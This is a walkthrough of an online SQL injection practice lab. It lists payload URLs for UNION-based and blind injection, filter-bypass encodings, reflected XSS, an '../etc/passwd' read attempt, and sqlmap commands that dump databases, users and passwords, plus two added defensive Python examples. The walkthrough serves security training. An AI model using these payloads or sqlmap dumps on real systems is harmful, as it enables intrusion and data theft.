• SQL Challenges target lab


    http://www.zixem.altervista.org/SQLi/

    Level 1

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+

    sqlmap -u "<injection point>" --dbs

    sqlmap -u "<injection point>" -D xx --tables

    sqlmap -u "<injection point>" -D XX -T XX --columns

    sqlmap -u "<injection point>" -D XX -T XX -C XX --dump

    sqlmap -u "<injection point>" --users

    sqlmap -u "<injection point>" --passwords

    XSS

    http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

    Level 2

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+

    Level 3

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+

    http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+

    Level 4

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+

    m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+

    http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+

    Level 5

    http://www.zixem.altervista.org/SQLi/login_lvl5.php

    http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

    Level 6

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+

    XSS

    http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E

    Run the blind injection with sqlmap

    Level 7

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+

    http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+


    No visible output

    http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

    Level 8

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

    Bypassing the filter with special characters

    A plus sign (+)

    A simple URL encoded space (%20)

    A null byte (%00)

    A newline (%0a)

    A tab (%09)

    A carriage return (%0d)

    Constructing the PoC

    Space %20

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

    Null byte %00

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+

    Newline %0a

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+

    Carriage return %0d

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+

    Tab %09

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--

    Mixed case

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--

    URL encoding

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20

    Using the special character *

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--

    Keyword replacement

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--

    http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--
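Why the keyword-replacement payload above gets through, shown from the defender's side as an added example (not code from the original post or from the challenge site). It assumes the level 8 filter is a single pass that deletes spaces and the lowercase word `select`; the table, column names and function names are constructed for illustration, and SQLite stands in for the real database.

```python
import re
import sqlite3

# URL-decoded form of the page's keyword-replacement payload (%09 is a tab).
PAYLOAD = "1\tUNION\tSEselectLECT\t1,2,3--"

def naive_filter(value: str) -> str:
    """Assumed blacklist: one pass that deletes spaces and 'select'."""
    return value.replace(" ", "").replace("select", "")

def make_db() -> sqlite3.Connection:
    """Constructed three-column table standing in for the challenge data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, price INTEGER)")
    db.execute("INSERT INTO items VALUES (1, 'book', 10)")
    return db

def filtered_query(db: sqlite3.Connection, raw_id: str) -> list:
    # Weak: whatever survives the blacklist is concatenated into the SQL text.
    # Deleting the inner 'select' rebuilds SELECT, and tabs still separate tokens.
    sql = "SELECT id, name, price FROM items WHERE id=" + naive_filter(raw_id)
    return db.execute(sql).fetchall()

def bound_query(db: sqlite3.Connection, raw_id: str) -> list:
    # Hardened: allow-list the expected shape, then bind the value as data.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, name, price FROM items WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    print("after filter :", repr(naive_filter(PAYLOAD)))
    print("filtered     :", filtered_query(make_db(), PAYLOAD))
    print("bound, attack:", bound_query(make_db(), PAYLOAD))
    print("bound, id=1  :", bound_query(make_db(), "1"))
```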

    Level 9

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+

    http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+

    Level 10

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

    Constructing the encoded payload

    1 AND 1=2 UNION SELECT 1,2--

    Uuencode it (using a Uuencode encoder/decoder tool)

    <,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```

    Base64-encode it

    PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

    Constructing the injection statement

    1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

    Result

    M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```

    Base64-encode it

    TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

    http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg
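The level 10 parameter is opaque to any check that looks only at the raw query string, so a log reviewer or input filter has to undo both layers (Base64, then uuencode) before inspecting it. The following is an added example, not code from the original post: it decodes two `x` values taken from this page and flags SQL tokens in the result. The function names and the keyword pattern are illustrative assumptions.

```python
import base64
import binascii
import re

# Illustrative token list to flag once the parameter has been decoded.
SQLI_RE = re.compile(r"\b(union|select|concat|order\s+by)\b|--|/\*", re.I)

# x values copied from this page: the challenge's default link and the first payload.
PAGE_DEFAULT = "ISwwYGAKYAo="
PAGE_PAYLOAD = "PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo="

def uudecode_body(text: bytes) -> bytes:
    """Decode bare uuencoded lines (no begin/end header), as used on the page."""
    out = b""
    for line in text.splitlines():
        if not line or line.startswith(b"`"):
            continue  # blank line or the zero-length terminator line
        out += binascii.a2b_uu(line)
    return out

def decode_x(value: str) -> str:
    """Undo the two layers applied to ?x=: Base64 first, then uuencode."""
    raw = base64.b64decode(value, validate=True)
    return uudecode_body(raw).decode("latin-1")

def inspect_param(value: str) -> dict:
    """Return the decoded text and whether it contains SQL tokens."""
    try:
        plain = decode_x(value)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        # A value that does not decode is itself worth a look.
        return {"decoded": None, "suspicious": True, "reason": f"undecodable: {exc}"}
    hit = SQLI_RE.search(plain)
    return {"decoded": plain, "suspicious": bool(hit),
            "reason": hit.group(0) if hit else ""}

if __name__ == "__main__":
    for sample in (PAGE_DEFAULT, PAGE_PAYLOAD, "not base64!"):
        print(sample[:24], "->", inspect_param(sample))
```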


    Reference: https://www.cnblogs.com/hack404/p/10387894.html
  • Original article: https://www.cnblogs.com/bingtang123/p/13298835.html